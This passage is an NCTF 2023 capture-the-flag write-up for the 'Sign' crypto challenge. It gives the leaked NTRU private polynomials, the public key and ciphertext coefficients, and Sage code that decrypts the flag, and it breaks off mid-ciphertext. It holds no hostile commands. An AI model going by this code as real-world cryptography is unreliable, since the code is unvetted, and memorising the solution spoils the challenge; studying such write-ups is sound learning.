2023 NCTF writeup

news2024/11/19 21:15:22

CRYPTO

Sign

直接给了fx,gx,等于私钥给了,直接套代码,具体可以参考:

https://0xffff.one/d/1424

fx =  [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1]
gx =  [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1]
hx =  [292, 374, 91, 384, 263, 330, 77, 497, 294, 141, 485, 464, 46, 478, 315, 100, 287, 1, 337, 477, 451, 387, 340, 370, 384, 19, 158, 440, 377, 177, 235, 340, 166, 359, 488, 332, 252, 443, 256, 453, 33, 282, 175, 18, 218, 208, 414, 147, 12, 468, 155, 34, 109, 390, 312, 472, 345, 176, 9, 184, 100, 414, 293, 366, 132, 128, 223, 242, 137, 223, 268, 259, 446, 57, 463, 344, 459, 115, 509, 510, 82, 42, 408, 139, 341, 351, 511, 339, 317, 139, 317, 297, 288, 58, 33, 120, 244, 194, 44, 128, 278, 130, 449, 282, 274, 376, 209, 240, 148, 426, 244, 319, 251, 438, 317, 166, 161, 37, 361, 468, 172, 116, 211, 64, 446, 162, 301, 447, 92, 325, 285, 4, 8, 160, 382, 365, 413, 150, 141, 323, 107, 225, 466, 93, 86, 219, 174, 198, 155, 88, 194, 259, 140, 36, 82, 462, 182, 496, 250, 337, 39, 435, 448, 365, 262, 146, 89, 283, 195, 395, 216, 159, 312, 53, 70, 485, 368, 130, 491, 474, 325, 4, 205, 1, 292, 330, 186, 66, 137, 291, 452, 236, 25, 114, 407, 125, 343, 2, 304, 267, 459, 432, 129, 21, 197, 51, 26, 342, 457, 163, 51, 52, 82, 229, 332, 72, 408, 242, 218, 286, 368, 503, 498, 434, 135, 311, 321, 205, 269, 318, 19, 119, 422, 425, 463, 368, 317, 99, 178, 390, 8, 127, 156, 27, 332, 437, 87, 187, 92, 115, 380, 54, 236, 287, 259, 386, 391, 94, 312, 454, 459, 340, 382, 424, 25, 318, 47, 249, 115, 20, 89, 82, 377, 328, 231, 298, 402, 336, 452, 264, 265, 83, 254, 156, 449, 34, 99, 412, 101, 183, 38, 142, 231, 181, 495, 6, 327, 278, 92, 452, 372, 12, 91, 102, 277, 98, 418, 22, 32, 493, 50, 374, 230, 479, 496, 6, 382, 300, 496, 157, 1, 221, 418, 381, 275, 391, 199, 472, 5, 222, 448, 377, 102, 468, 94, 35, 6, 6, 464, 452, 453, 354, 277, 425, 120, 501, 172, 222, 314, 362, 6, 105, 387, 77, 14, 112, 289, 358, 495, 350, 411, 378, 30, 89, 115, 171, 42, 32, 427, 125, 420, 486, 435, 151, 234, 416, 428, 425, 250, 142, 301, 245, 154, 338, 223, 292, 27, 194, 220, 34, 283, 255, 53, 5, 420, 134, 351, 216, 92, 242, 39, 454, 96, 239, 390, 182, 368, 463, 176, 187, 25, 122, 441, 54, 171, 426, 435, 318, 345, 166, 224, 258, 246, 349, 50, 400, 381, 236, 315, 439, 249, 201, 262, 95, 210, 327, 199, 205, 402, 175, 280, 337, 388, 205, 336, 52, 68, 364, 293, 462, 388, 354, 169, 163, 72, 374, 220, 355, 275, 36, 208, 198, 363, 369, 344, 61, 13, 230, 196, 190, 463, 351, 37, 276, 336, 110, 352, 56, 117, 376, 500, 373, 438, 309, 496, 400, 76, 169, 447, 434, 255, 456, 511, 414, 83, 369, 174, 291, 213, 227, 254, 186, 145, 402, 265, 13, 20, 212, 442]
e=[219, 149, 491, 115, 68, 464, 91, 223, 480, 506, 103, 373, 19, 52, 368, 467, 304, 380, 495, 372, 506, 318, 320, 263, 120, 126, 165, 271, 435, 378, 443, 261, 336, 381, 57, 360, 36, 155, 424, 458, 84, 80, 187, 261, 501, 279, 167, 13, 241, 85, 214, 133, 483, 374, 430, 401, 265, 127, 497, 405, 60, 34, 81, 422, 423, 200, 276, 424, 245, 437, 31, 193, 282, 154, 93, 13, 499, 190, 1, 304, 415, 189, 82, 472, 13, 488, 366, 364, 319, 121, 322, 120, 468, 134, 305, 228, 288, 284, 33, 430, 125, 366, 212, 207, 227, 201, 286, 377, 376, 57, 336, 379, 101, 461, 375, 101, 475, 126, 306, 73, 88, 1, 149, 378, 381, 129, 402, 341, 390, 57, 305, 139, 436, 101, 386, 460, 43, 468, 9, 449, 255, 184, 374, 466, 429, 167, 101, 247, 183, 159, 346, 45, 79, 192, 259, 32, 140, 151, 16, 214, 42, 450, 111, 7, 303, 286, 435, 491, 339, 248, 114, 185, 103, 81, 414, 100, 485, 428, 137, 13, 243, 202, 62, 208, 136, 376, 88, 158, 377, 404, 355, 194, 452, 373, 107, 290, 89, 489, 259, 462, 169, 235, 86, 214, 333, 472, 343, 487, 19, 371, 203, 234, 315, 339, 430, 133, 96, 161, 278, 13, 20, 87, 303, 466, 353, 139, 395, 131, 298, 85, 144, 244, 150, 488, 254, 284, 89, 300, 297, 288, 245, 439, 307, 222, 110, 343, 318, 202, 429, 81, 203, 468, 144, 140, 480, 370, 501, 14, 490, 278, 493, 390, 214, 108, 174, 150, 287, 197, 497, 374, 420, 298, 222, 188, 146, 298, 466, 459, 456, 16, 131, 253, 153, 481, 342, 498, 173, 12, 452, 197, 233, 18, 439, 332, 185, 48, 330, 4, 99, 105, 75, 306, 174, 492, 131, 39, 126, 491, 79, 145, 186, 493, 23, 230, 195, 118, 310, 173, 244, 80, 25, 502, 373, 457, 275, 282, 26, 206, 14, 181, 61, 391, 454, 417, 370, 70, 413, 389, 434, 400, 88, 417, 364, 458, 496, 425, 12, 280, 102, 265, 471, 43, 257, 327, 10, 334, 239, 344, 77, 298, 140, 287, 260, 194, 431, 65, 304, 302, 210, 393, 473, 463, 312, 255, 368, 476, 462, 390, 412, 266, 138, 410, 246, 101, 460, 307, 123, 4, 240, 502, 115, 147, 370, 241, 222, 495, 109, 51, 138, 354, 447, 282, 434, 280, 275, 404, 214, 68, 77, 167, 302, 95, 462, 16, 184, 213, 227, 130, 50, 405, 30, 353, 24, 143, 100, 163, 212, 388, 283, 252, 187, 247, 190, 163, 252, 169, 267, 363, 72, 399, 195, 215, 103, 60, 466, 318, 71, 193, 449, 65, 358, 443, 260, 253, 46, 5, 416, 115, 390, 15, 120, 384, 50, 122, 87, 428, 282, 464, 83, 80, 401, 8, 175, 457, 301, 63, 205, 402, 468, 368, 510, 488, 345, 103, 306, 387, 34, 119, 459, 43, 319, 264, 184, 406, 407, 358, 242, 42, 241, 34, 118, 477, 117, 325, 511, 499, 365, 192, 507]
R= PolynomialRing(ZZ,'xq')
e=R(e)
print('e=',e)
N=509
p=3
q=512
d=3
# Sage
from Crypto.Util.number import *
# from secret import flag
class NTRU:
    def __init__(self, N, p, q, d):
        self.debug = False

        assert q > (6*d+1)*p
        assert is_prime(N)
        assert gcd(N, q) == 1 and gcd(p, q) == 1
        self.N = N
        self.p = p
        self.q = q
        self.d = d

        self.R_  = PolynomialRing(ZZ,'x')
        self.Rp_ = PolynomialRing(Zmod(p),'xp')
        self.Rq_ = PolynomialRing(Zmod(q),'xq')
        x = self.R_.gen()
        xp = self.Rp_.gen()
        xq = self.Rq_.gen()
        self.R  = self.R_.quotient(x^N - 1, 'y')
        self.Rp = self.Rp_.quotient(xp^N - 1, 'yp')
        self.Rq = self.Rq_.quotient(xq^N - 1, 'yq')

        self.RpOrder = self.p^self.N - self.p
        self.RqOrder = self.q^self.N - self.q
        self.sk, self.pk = self.keyGen()

    def T(self, d1, d2):
        assert self.N >= d1+d2
        t = [1]*d1 + [-1]*d2 + [0]*(self.N-d1-d2)
        shuffle(t)
        return self.R(t)

    def lift(self, fx):
        mod = Integer(fx.base_ring()(-1)) + 1
        return self.R([Integer(x)-mod if x > mod//2 else x for x in list(fx)])
    def setKey(self, fx, gx):
        assert type(fx) == type('x^2 + 1')  # e.g.
        assert type(gx) == type('x^2 - 1')  # emmm

        try:
            fx = self.R(fx)
            gx = self.R(gx)

            Fp = self.Rp(list(fx)) ^ (-1)
            Fq = pow(self.Rq(list(fx)), self.RqOrder - 1)
            hx = Fq * self.Rq(list(gx))

            self.sk = (fx, gx, Fp, Fq, hx)
            self.pk = hx
            return True
        except:
            return False
    def keyGen(self):
        fx = self.T(self.d+1, self.d)
        gx = self.T(self.d, self.d)

        Fp = self.Rp(list(fx)) ^ (-1)                         
        assert pow(self.Rp(list(fx)), self.RpOrder-1) == Fp 
        assert self.Rp(list(fx)) * Fp == 1                

        Fq = pow(self.Rq(list(fx)), self.RqOrder - 1)   
        assert self.Rq(list(fx)) * Fq == 1              

        hx = Fq * self.Rq(list(gx))

        sk = (fx, gx, Fp, Fq, hx)
        pk = hx
        return sk, pk

    def getKey(self):
        ssk = (
              self.R_(list(self.sk[0])),   
              self.R_(list(self.sk[1]))   
            )
        spk = self.Rq_(list(self.pk)) 
        return ssk, spk

    def pad(self,msg):
        pad_length = self.N - len(msg)
        msg += [-1 for _ in range(pad_length)]
        return msg

    def encode(self,msg):
        result = []
        for i in msg:
            result += [int(_) for _ in bin(i)[2:].zfill(8)]
        if len(result) < self.N:result = self.pad(result)
        result = self.R(result)
        return result


    def encrypt(self, m):
        m = self.encode(m)
        assert self.pk != None
        hx = self.pk
        mx = self.R(m)
        mx = self.Rp(list(mx))            
        mx = self.Rq(list(mx))   

        rx = self.T(self.d, self.d)
        rx = self.Rq(list(rx))

        e = self.p * rx * hx + mx
        return list(e)
    def decrypt(self, e):
        assert type(e) == type('xq^2 - 1')  # e.g.
        assert self.sk != None
        fx, gx, Fp, Fq, hx = self.sk

        e = self.Rq(e)
        ax = self.Rq(list(fx)) * e
        a = self.lift(ax)                   # center lift
        bx = Fp * self.Rp(list(a))
        b = self.lift(bx)

        #return bx
        return self.R_(list(b))

if __name__ == '__main__':
    ntru = NTRU(N=509, p=3, q=512, d=3)
    fx= 'x^440 - x^405 + x^294 + x^248 + x^212 - x^208 - x^145'
    gx= 'x^393 + x^335 - x^322 - x^311 - x^248 + x^128'
#     assert len(flag) == 42
#     sk, pk = ntru.getKey()
#     print("fx = " , sk[0].list())
#     print("gx = " , sk[1].list())
#     print("hx = " , pk.list())
    hx= '442*xq^508 + 212*xq^507 + 20*xq^506 + 13*xq^505 + 265*xq^504 + 402*xq^503 + 145*xq^502 + 186*xq^501 + 254*xq^500 + 227*xq^499 + 213*xq^498 + 291*xq^497 + 174*xq^496 + 369*xq^495 + 83*xq^494 + 414*xq^493 + 511*xq^492 + 456*xq^491 + 255*xq^490 + 434*xq^489 + 447*xq^488 + 169*xq^487 + 76*xq^486 + 400*xq^485 + 496*xq^484 + 309*xq^483 + 438*xq^482 + 373*xq^481 + 500*xq^480 + 376*xq^479 + 117*xq^478 + 56*xq^477 + 352*xq^476 + 110*xq^475 + 336*xq^474 + 276*xq^473 + 37*xq^472 + 351*xq^471 + 463*xq^470 + 190*xq^469 + 196*xq^468 + 230*xq^467 + 13*xq^466 + 61*xq^465 + 344*xq^464 + 369*xq^463 + 363*xq^462 + 198*xq^461 + 208*xq^460 + 36*xq^459 + 275*xq^458 + 355*xq^457 + 220*xq^456 + 374*xq^455 + 72*xq^454 + 163*xq^453 + 169*xq^452 + 354*xq^451 + 388*xq^450 + 462*xq^449 + 293*xq^448 + 364*xq^447 + 68*xq^446 + 52*xq^445 + 336*xq^444 + 205*xq^443 + 388*xq^442 + 337*xq^441 + 280*xq^440 + 175*xq^439 + 402*xq^438 + 205*xq^437 + 199*xq^436 + 327*xq^435 + 210*xq^434 + 95*xq^433 + 262*xq^432 + 201*xq^431 + 249*xq^430 + 439*xq^429 + 315*xq^428 + 236*xq^427 + 381*xq^426 + 400*xq^425 + 50*xq^424 + 349*xq^423 + 246*xq^422 + 258*xq^421 + 224*xq^420 + 166*xq^419 + 345*xq^418 + 318*xq^417 + 435*xq^416 + 426*xq^415 + 171*xq^414 + 54*xq^413 + 441*xq^412 + 122*xq^411 + 25*xq^410 + 187*xq^409 + 176*xq^408 + 463*xq^407 + 368*xq^406 + 182*xq^405 + 390*xq^404 + 239*xq^403 + 96*xq^402 + 454*xq^401 + 39*xq^400 + 242*xq^399 + 92*xq^398 + 216*xq^397 + 351*xq^396 + 134*xq^395 + 420*xq^394 + 5*xq^393 + 53*xq^392 + 255*xq^391 + 283*xq^390 + 34*xq^389 + 220*xq^388 + 194*xq^387 + 27*xq^386 + 292*xq^385 + 223*xq^384 + 338*xq^383 + 154*xq^382 + 245*xq^381 + 301*xq^380 + 142*xq^379 + 250*xq^378 + 425*xq^377 + 428*xq^376 + 416*xq^375 + 234*xq^374 + 151*xq^373 + 435*xq^372 + 486*xq^371 + 420*xq^370 + 125*xq^369 + 427*xq^368 + 32*xq^367 + 42*xq^366 + 171*xq^365 + 115*xq^364 + 89*xq^363 + 30*xq^362 + 378*xq^361 + 411*xq^360 + 350*xq^359 + 495*xq^358 + 358*xq^357 + 289*xq^356 + 112*xq^355 + 14*xq^354 + 77*xq^353 + 387*xq^352 + 105*xq^351 + 6*xq^350 + 362*xq^349 + 314*xq^348 + 222*xq^347 + 172*xq^346 + 501*xq^345 + 120*xq^344 + 425*xq^343 + 277*xq^342 + 354*xq^341 + 453*xq^340 + 452*xq^339 + 464*xq^338 + 6*xq^337 + 6*xq^336 + 35*xq^335 + 94*xq^334 + 468*xq^333 + 102*xq^332 + 377*xq^331 + 448*xq^330 + 222*xq^329 + 5*xq^328 + 472*xq^327 + 199*xq^326 + 391*xq^325 + 275*xq^324 + 381*xq^323 + 418*xq^322 + 221*xq^321 + xq^320 + 157*xq^319 + 496*xq^318 + 300*xq^317 + 382*xq^316 + 6*xq^315 + 496*xq^314 + 479*xq^313 + 230*xq^312 + 374*xq^311 + 50*xq^310 + 493*xq^309 + 32*xq^308 + 22*xq^307 + 418*xq^306 + 98*xq^305 + 277*xq^304 + 102*xq^303 + 91*xq^302 + 12*xq^301 + 372*xq^300 + 452*xq^299 + 92*xq^298 + 278*xq^297 + 327*xq^296 + 6*xq^295 + 495*xq^294 + 181*xq^293 + 231*xq^292 + 142*xq^291 + 38*xq^290 + 183*xq^289 + 101*xq^288 + 412*xq^287 + 99*xq^286 + 34*xq^285 + 449*xq^284 + 156*xq^283 + 254*xq^282 + 83*xq^281 + 265*xq^280 + 264*xq^279 + 452*xq^278 + 336*xq^277 + 402*xq^276 + 298*xq^275 + 231*xq^274 + 328*xq^273 + 377*xq^272 + 82*xq^271 + 89*xq^270 + 20*xq^269 + 115*xq^268 + 249*xq^267 + 47*xq^266 + 318*xq^265 + 25*xq^264 + 424*xq^263 + 382*xq^262 + 340*xq^261 + 459*xq^260 + 454*xq^259 + 312*xq^258 + 94*xq^257 + 391*xq^256 + 386*xq^255 + 259*xq^254 + 287*xq^253 + 236*xq^252 + 54*xq^251 + 380*xq^250 + 115*xq^249 + 92*xq^248 + 187*xq^247 + 87*xq^246 + 437*xq^245 + 332*xq^244 + 27*xq^243 + 156*xq^242 + 127*xq^241 + 8*xq^240 + 390*xq^239 + 178*xq^238 + 99*xq^237 + 317*xq^236 + 368*xq^235 + 463*xq^234 + 425*xq^233 + 422*xq^232 + 119*xq^231 + 19*xq^230 + 318*xq^229 + 269*xq^228 + 205*xq^227 + 321*xq^226 + 311*xq^225 + 135*xq^224 + 434*xq^223 + 498*xq^222 + 503*xq^221 + 368*xq^220 + 286*xq^219 + 218*xq^218 + 242*xq^217 + 408*xq^216 + 72*xq^215 + 332*xq^214 + 229*xq^213 + 82*xq^212 + 52*xq^211 + 51*xq^210 + 163*xq^209 + 457*xq^208 + 342*xq^207 + 26*xq^206 + 51*xq^205 + 197*xq^204 + 21*xq^203 + 129*xq^202 + 432*xq^201 + 459*xq^200 + 267*xq^199 + 304*xq^198 + 2*xq^197 + 343*xq^196 + 125*xq^195 + 407*xq^194 + 114*xq^193 + 25*xq^192 + 236*xq^191 + 452*xq^190 + 291*xq^189 + 137*xq^188 + 66*xq^187 + 186*xq^186 + 330*xq^185 + 292*xq^184 + xq^183 + 205*xq^182 + 4*xq^181 + 325*xq^180 + 474*xq^179 + 491*xq^178 + 130*xq^177 + 368*xq^176 + 485*xq^175 + 70*xq^174 + 53*xq^173 + 312*xq^172 + 159*xq^171 + 216*xq^170 + 395*xq^169 + 195*xq^168 + 283*xq^167 + 89*xq^166 + 146*xq^165 + 262*xq^164 + 365*xq^163 + 448*xq^162 + 435*xq^161 + 39*xq^160 + 337*xq^159 + 250*xq^158 + 496*xq^157 + 182*xq^156 + 462*xq^155 + 82*xq^154 + 36*xq^153 + 140*xq^152 + 259*xq^151 + 194*xq^150 + 88*xq^149 + 155*xq^148 + 198*xq^147 + 174*xq^146 + 219*xq^145 + 86*xq^144 + 93*xq^143 + 466*xq^142 + 225*xq^141 + 107*xq^140 + 323*xq^139 + 141*xq^138 + 150*xq^137 + 413*xq^136 + 365*xq^135 + 382*xq^134 + 160*xq^133 + 8*xq^132 + 4*xq^131 + 285*xq^130 + 325*xq^129 + 92*xq^128 + 447*xq^127 + 301*xq^126 + 162*xq^125 + 446*xq^124 + 64*xq^123 + 211*xq^122 + 116*xq^121 + 172*xq^120 + 468*xq^119 + 361*xq^118 + 37*xq^117 + 161*xq^116 + 166*xq^115 + 317*xq^114 + 438*xq^113 + 251*xq^112 + 319*xq^111 + 244*xq^110 + 426*xq^109 + 148*xq^108 + 240*xq^107 + 209*xq^106 + 376*xq^105 + 274*xq^104 + 282*xq^103 + 449*xq^102 + 130*xq^101 + 278*xq^100 + 128*xq^99 + 44*xq^98 + 194*xq^97 + 244*xq^96 + 120*xq^95 + 33*xq^94 + 58*xq^93 + 288*xq^92 + 297*xq^91 + 317*xq^90 + 139*xq^89 + 317*xq^88 + 339*xq^87 + 511*xq^86 + 351*xq^85 + 341*xq^84 + 139*xq^83 + 408*xq^82 + 42*xq^81 + 82*xq^80 + 510*xq^79 + 509*xq^78 + 115*xq^77 + 459*xq^76 + 344*xq^75 + 463*xq^74 + 57*xq^73 + 446*xq^72 + 259*xq^71 + 268*xq^70 + 223*xq^69 + 137*xq^68 + 242*xq^67 + 223*xq^66 + 128*xq^65 + 132*xq^64 + 366*xq^63 + 293*xq^62 + 414*xq^61 + 100*xq^60 + 184*xq^59 + 9*xq^58 + 176*xq^57 + 345*xq^56 + 472*xq^55 + 312*xq^54 + 390*xq^53 + 109*xq^52 + 34*xq^51 + 155*xq^50 + 468*xq^49 + 12*xq^48 + 147*xq^47 + 414*xq^46 + 208*xq^45 + 218*xq^44 + 18*xq^43 + 175*xq^42 + 282*xq^41 + 33*xq^40 + 453*xq^39 + 256*xq^38 + 443*xq^37 + 252*xq^36 + 332*xq^35 + 488*xq^34 + 359*xq^33 + 166*xq^32 + 340*xq^31 + 235*xq^30 + 177*xq^29 + 377*xq^28 + 440*xq^27 + 158*xq^26 + 19*xq^25 + 384*xq^24 + 370*xq^23 + 340*xq^22 + 387*xq^21 + 451*xq^20 + 477*xq^19 + 337*xq^18 + xq^17 + 287*xq^16 + 100*xq^15 + 315*xq^14 + 478*xq^13 + 46*xq^12 + 464*xq^11 + 485*xq^10 + 141*xq^9 + 294*xq^8 + 497*xq^7 + 77*xq^6 + 330*xq^5 + 263*xq^4 + 384*xq^3 + 91*xq^2 + 374*xq + 292'
    e= '507*xq^508 + 192*xq^507 + 365*xq^506 + 499*xq^505 + 511*xq^504 + 325*xq^503 + 117*xq^502 + 477*xq^501 + 118*xq^500 + 34*xq^499 + 241*xq^498 + 42*xq^497 + 242*xq^496 + 358*xq^495 + 407*xq^494 + 406*xq^493 + 184*xq^492 + 264*xq^491 + 319*xq^490 + 43*xq^489 + 459*xq^488 + 119*xq^487 + 34*xq^486 + 387*xq^485 + 306*xq^484 + 103*xq^483 + 345*xq^482 + 488*xq^481 + 510*xq^480 + 368*xq^479 + 468*xq^478 + 402*xq^477 + 205*xq^476 + 63*xq^475 + 301*xq^474 + 457*xq^473 + 175*xq^472 + 8*xq^471 + 401*xq^470 + 80*xq^469 + 83*xq^468 + 464*xq^467 + 282*xq^466 + 428*xq^465 + 87*xq^464 + 122*xq^463 + 50*xq^462 + 384*xq^461 + 120*xq^460 + 15*xq^459 + 390*xq^458 + 115*xq^457 + 416*xq^456 + 5*xq^455 + 46*xq^454 + 253*xq^453 + 260*xq^452 + 443*xq^451 + 358*xq^450 + 65*xq^449 + 449*xq^448 + 193*xq^447 + 71*xq^446 + 318*xq^445 + 466*xq^444 + 60*xq^443 + 103*xq^442 + 215*xq^441 + 195*xq^440 + 399*xq^439 + 72*xq^438 + 363*xq^437 + 267*xq^436 + 169*xq^435 + 252*xq^434 + 163*xq^433 + 190*xq^432 + 247*xq^431 + 187*xq^430 + 252*xq^429 + 283*xq^428 + 388*xq^427 + 212*xq^426 + 163*xq^425 + 100*xq^424 + 143*xq^423 + 24*xq^422 + 353*xq^421 + 30*xq^420 + 405*xq^419 + 50*xq^418 + 130*xq^417 + 227*xq^416 + 213*xq^415 + 184*xq^414 + 16*xq^413 + 462*xq^412 + 95*xq^411 + 302*xq^410 + 167*xq^409 + 77*xq^408 + 68*xq^407 + 214*xq^406 + 404*xq^405 + 275*xq^404 + 280*xq^403 + 434*xq^402 + 282*xq^401 + 447*xq^400 + 354*xq^399 + 138*xq^398 + 51*xq^397 + 109*xq^396 + 495*xq^395 + 222*xq^394 + 241*xq^393 + 370*xq^392 + 147*xq^391 + 115*xq^390 + 502*xq^389 + 240*xq^388 + 4*xq^387 + 123*xq^386 + 307*xq^385 + 460*xq^384 + 101*xq^383 + 246*xq^382 + 410*xq^381 + 138*xq^380 + 266*xq^379 + 412*xq^378 + 390*xq^377 + 462*xq^376 + 476*xq^375 + 368*xq^374 + 255*xq^373 + 312*xq^372 + 463*xq^371 + 473*xq^370 + 393*xq^369 + 210*xq^368 + 302*xq^367 + 304*xq^366 + 65*xq^365 + 431*xq^364 + 194*xq^363 + 260*xq^362 + 287*xq^361 + 140*xq^360 + 298*xq^359 + 77*xq^358 + 344*xq^357 + 239*xq^356 + 334*xq^355 + 10*xq^354 + 327*xq^353 + 257*xq^352 + 43*xq^351 + 471*xq^350 + 265*xq^349 + 102*xq^348 + 280*xq^347 + 12*xq^346 + 425*xq^345 + 496*xq^344 + 458*xq^343 + 364*xq^342 + 417*xq^341 + 88*xq^340 + 400*xq^339 + 434*xq^338 + 389*xq^337 + 413*xq^336 + 70*xq^335 + 370*xq^334 + 417*xq^333 + 454*xq^332 + 391*xq^331 + 61*xq^330 + 181*xq^329 + 14*xq^328 + 206*xq^327 + 26*xq^326 + 282*xq^325 + 275*xq^324 + 457*xq^323 + 373*xq^322 + 502*xq^321 + 25*xq^320 + 80*xq^319 + 244*xq^318 + 173*xq^317 + 310*xq^316 + 118*xq^315 + 195*xq^314 + 230*xq^313 + 23*xq^312 + 493*xq^311 + 186*xq^310 + 145*xq^309 + 79*xq^308 + 491*xq^307 + 126*xq^306 + 39*xq^305 + 131*xq^304 + 492*xq^303 + 174*xq^302 + 306*xq^301 + 75*xq^300 + 105*xq^299 + 99*xq^298 + 4*xq^297 + 330*xq^296 + 48*xq^295 + 185*xq^294 + 332*xq^293 + 439*xq^292 + 18*xq^291 + 233*xq^290 + 197*xq^289 + 452*xq^288 + 12*xq^287 + 173*xq^286 + 498*xq^285 + 342*xq^284 + 481*xq^283 + 153*xq^282 + 253*xq^281 + 131*xq^280 + 16*xq^279 + 456*xq^278 + 459*xq^277 + 466*xq^276 + 298*xq^275 + 146*xq^274 + 188*xq^273 + 222*xq^272 + 298*xq^271 + 420*xq^270 + 374*xq^269 + 497*xq^268 + 197*xq^267 + 287*xq^266 + 150*xq^265 + 174*xq^264 + 108*xq^263 + 214*xq^262 + 390*xq^261 + 493*xq^260 + 278*xq^259 + 490*xq^258 + 14*xq^257 + 501*xq^256 + 370*xq^255 + 480*xq^254 + 140*xq^253 + 144*xq^252 + 468*xq^251 + 203*xq^250 + 81*xq^249 + 429*xq^248 + 202*xq^247 + 318*xq^246 + 343*xq^245 + 110*xq^244 + 222*xq^243 + 307*xq^242 + 439*xq^241 + 245*xq^240 + 288*xq^239 + 297*xq^238 + 300*xq^237 + 89*xq^236 + 284*xq^235 + 254*xq^234 + 488*xq^233 + 150*xq^232 + 244*xq^231 + 144*xq^230 + 85*xq^229 + 298*xq^228 + 131*xq^227 + 395*xq^226 + 139*xq^225 + 353*xq^224 + 466*xq^223 + 303*xq^222 + 87*xq^221 + 20*xq^220 + 13*xq^219 + 278*xq^218 + 161*xq^217 + 96*xq^216 + 133*xq^215 + 430*xq^214 + 339*xq^213 + 315*xq^212 + 234*xq^211 + 203*xq^210 + 371*xq^209 + 19*xq^208 + 487*xq^207 + 343*xq^206 + 472*xq^205 + 333*xq^204 + 214*xq^203 + 86*xq^202 + 235*xq^201 + 169*xq^200 + 462*xq^199 + 259*xq^198 + 489*xq^197 + 89*xq^196 + 290*xq^195 + 107*xq^194 + 373*xq^193 + 452*xq^192 + 194*xq^191 + 355*xq^190 + 404*xq^189 + 377*xq^188 + 158*xq^187 + 88*xq^186 + 376*xq^185 + 136*xq^184 + 208*xq^183 + 62*xq^182 + 202*xq^181 + 